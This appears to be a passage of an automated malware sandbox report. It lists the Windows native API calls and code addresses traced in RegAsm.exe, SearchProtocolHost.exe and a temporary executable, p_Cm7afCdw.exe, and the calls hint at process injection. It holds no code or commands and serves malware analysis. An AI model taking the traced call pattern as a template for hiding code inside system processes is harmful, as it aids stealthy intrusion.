                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042CE33 NtClose,4_2_0042CE33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C635C0 NtCreateMutant,LdrInitializeThunk,4_2_02C635C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62B60 NtClose,LdrInitializeThunk,4_2_02C62B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02C62C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02C62DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C64340 NtSetContextThread,4_2_02C64340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C63090 NtSetValueKey,4_2_02C63090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C63010 NtOpenDirectoryObject,4_2_02C63010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C64650 NtSuspendThread,4_2_02C64650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62AD0 NtReadFile,4_2_02C62AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62AF0 NtWriteFile,4_2_02C62AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62AB0 NtWaitForSingleObject,4_2_02C62AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62BE0 NtQueryValueKey,4_2_02C62BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62BF0 NtAllocateVirtualMemory,4_2_02C62BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62B80 NtQueryInformationFile,4_2_02C62B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62BA0 NtEnumerateValueKey,4_2_02C62BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C639B0 NtGetContextThread,4_2_02C639B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62EE0 NtQueueApcThread,4_2_02C62EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62E80 NtReadVirtualMemory,4_2_02C62E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62EA0 NtAdjustPrivilegesToken,4_2_02C62EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62E30 NtWriteVirtualMemory,4_2_02C62E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62FE0 NtCreateFile,4_2_02C62FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62F90 NtProtectVirtualMemory,4_2_02C62F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62FA0 NtQuerySection,4_2_02C62FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62FB0 NtResumeThread,4_2_02C62FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62F60 NtCreateProcessEx,4_2_02C62F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62F30 NtCreateSection,4_2_02C62F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62CC0 NtQueryVirtualMemory,4_2_02C62CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62CF0 NtOpenProcess,4_2_02C62CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62CA0 NtQueryInformationToken,4_2_02C62CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62C60 NtCreateKey,4_2_02C62C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62C00 NtQueryInformationProcess,4_2_02C62C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62DD0 NtDelayExecution,4_2_02C62DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62DB0 NtEnumerateKey,4_2_02C62DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C63D70 NtOpenThread,4_2_02C63D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62D00 NtSetInformationFile,4_2_02C62D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62D10 NtMapViewOfSection,4_2_02C62D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C63D10 NtOpenProcessToken,4_2_02C63D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62D30 NtUnmapViewOfSection,4_2_02C62D30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B4340 NtSetContextThread,LdrInitializeThunk,6_2_033B4340
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B4650 NtSuspendThread,LdrInitializeThunk,6_2_033B4650
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B35C0 NtCreateMutant,LdrInitializeThunk,6_2_033B35C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2B60 NtClose,LdrInitializeThunk,6_2_033B2B60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_033B2BA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_033B2BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_033B2BE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2AF0 NtWriteFile,LdrInitializeThunk,6_2_033B2AF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2AD0 NtReadFile,LdrInitializeThunk,6_2_033B2AD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B39B0 NtGetContextThread,LdrInitializeThunk,6_2_033B39B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2F30 NtCreateSection,LdrInitializeThunk,6_2_033B2F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2FB0 NtResumeThread,LdrInitializeThunk,6_2_033B2FB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2FE0 NtCreateFile,LdrInitializeThunk,6_2_033B2FE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_033B2E80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_033B2EE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_033B2D30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_033B2D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_033B2DF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2DD0 NtDelayExecution,LdrInitializeThunk,6_2_033B2DD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_033B2C70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2C60 NtCreateKey,LdrInitializeThunk,6_2_033B2C60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_033B2CA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B3010 NtOpenDirectoryObject,6_2_033B3010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B3090 NtSetValueKey,6_2_033B3090
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2B80 NtQueryInformationFile,6_2_033B2B80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2AB0 NtWaitForSingleObject,6_2_033B2AB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2F60 NtCreateProcessEx,6_2_033B2F60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2FA0 NtQuerySection,6_2_033B2FA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2F90 NtProtectVirtualMemory,6_2_033B2F90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2E30 NtWriteVirtualMemory,6_2_033B2E30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2EA0 NtAdjustPrivilegesToken,6_2_033B2EA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B3D10 NtOpenProcessToken,6_2_033B3D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2D00 NtSetInformationFile,6_2_033B2D00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B3D70 NtOpenThread,6_2_033B3D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2DB0 NtEnumerateKey,6_2_033B2DB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2C00 NtQueryInformationProcess,6_2_033B2C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2CF0 NtOpenProcess,6_2_033B2CF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B2CC0 NtQueryVirtualMemory,6_2_033B2CC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C296C0 NtCreateFile,6_2_02C296C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C29B10 NtAllocateVirtualMemory,6_2_02C29B10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C29820 NtReadFile,6_2_02C29820
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C299B0 NtClose,6_2_02C299B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C29910 NtDeleteFile,6_2_02C29910
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323F899 NtMapViewOfSection,6_2_0323F899
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeCode function: 2_2_01460D982_2_01460D98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418DC34_2_00418DC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E8104_2_0040E810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E8134_2_0040E813
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004108334_2_00410833
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E9574_2_0040E957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E9634_2_0040E963
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040290C4_2_0040290C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004029104_2_00402910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004032004_2_00403200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F4434_2_0042F443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004026404_2_00402640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004106134_2_00410613
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004026334_2_00402633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416F7D4_2_00416F7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416FC34_2_00416FC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416FBE4_2_00416FBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C04_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C352A04_2_02C352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD02744_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF03E64_2_02CF03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E3F04_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C7739A4_2_02C7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D34C4_2_02C1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEA3524_2_02CEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE132D4_2_02CE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF0CC4_2_02CDF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C04_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE70E94_2_02CE70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEF0E04_2_02CEF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE81CC4_2_02CE81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF01AA4_2_02CF01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3B1B04_2_02C3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB16B4_2_02CFB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C6516C4_2_02C6516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F1724_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C201004_2_02C20100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CCA1184_2_02CCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE16CC4_2_02CE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4C6E04_2_02C4C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2C7C04_2_02C2C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEF7B04_2_02CEF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C547504_2_02C54750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C307704_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDE4F64_2_02CDE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE24464_2_02CE2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C214604_2_02C21460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEF43F4_2_02CEF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF05914_2_02CF0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CCD5B04_2_02CCD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE75714_2_02CE7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C305354_2_02C30535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDDAC64_2_02CDDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2EA804_2_02C2EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CCDAAC4_2_02CCDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C75AA04_2_02C75AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFA494_2_02CEFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE7A464_2_02CE7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA3A6C4_2_02CA3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE6BD74_2_02CE6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF9B804_2_02BF9B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4FB804_2_02C4FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEAB404_2_02CEAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFB764_2_02CEFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C338E04_2_02C338E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5E8F04_2_02C5E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C168B84_2_02C168B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C328404_2_02C32840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3A8404_2_02C3A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C329A04_2_02C329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFA9A64_2_02CFA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C399504_2_02C39950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B9504_2_02C4B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C469624_2_02C46962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEEEDB4_2_02CEEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C42E904_2_02C42E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CECE934_2_02CECE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C39EB04_2_02C39EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30E594_2_02C30E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEEE264_2_02CEEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C22FC84_2_02C22FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3CFE04_2_02C3CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31F924_2_02C31F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF3FD54_2_02BF3FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF3FD24_2_02BF3FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFFB14_2_02CEFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA4F404_2_02CA4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFF094_2_02CEFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C50F304_2_02C50F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C20CF24_2_02C20CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFCF24_2_02CEFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0CB54_2_02CD0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30C004_2_02C30C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA9C324_2_02CA9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4FDC04_2_02C4FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2ADE04_2_02C2ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C48DBF4_2_02C48DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C33D404_2_02C33D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE1D5A4_2_02CE1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE7D734_2_02CE7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3AD004_2_02C3AD00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343A3526_2_0343A352
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343132D6_2_0343132D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0336D34C6_2_0336D34C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034403E66_2_034403E6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033C739A6_2_033C739A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338E3F06_2_0338E3F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034202746_2_03420274
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033852A06_2_033852A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034212ED6_2_034212ED
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339B2C06_2_0339B2C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0344B16B6_2_0344B16B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033701006_2_03370100
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0336F1726_2_0336F172
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B516C6_2_033B516C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0341A1186_2_0341A118
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338B1B06_2_0338B1B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034381CC6_2_034381CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034401AA6_2_034401AA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0342F0CC6_2_0342F0CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343F0E06_2_0343F0E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034370E96_2_034370E9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033870C06_2_033870C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033807706_2_03380770
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033A47506_2_033A4750
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343F7B06_2_0343F7B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0337C7C06_2_0337C7C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034316CC6_2_034316CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339C6E06_2_0339C6E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033805356_2_03380535
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034375716_2_03437571
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034405916_2_03440591
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0341D5B06_2_0341D5B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034324466_2_03432446
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033714606_2_03371460
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343F43F6_2_0343F43F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0342E4F66_2_0342E4F6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343AB406_2_0343AB40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FB766_2_0343FB76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03436BD76_2_03436BD7
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339FB806_2_0339FB80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03437A466_2_03437A46
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FA496_2_0343FA49
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033F3A6C6_2_033F3A6C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0342DAC66_2_0342DAC6
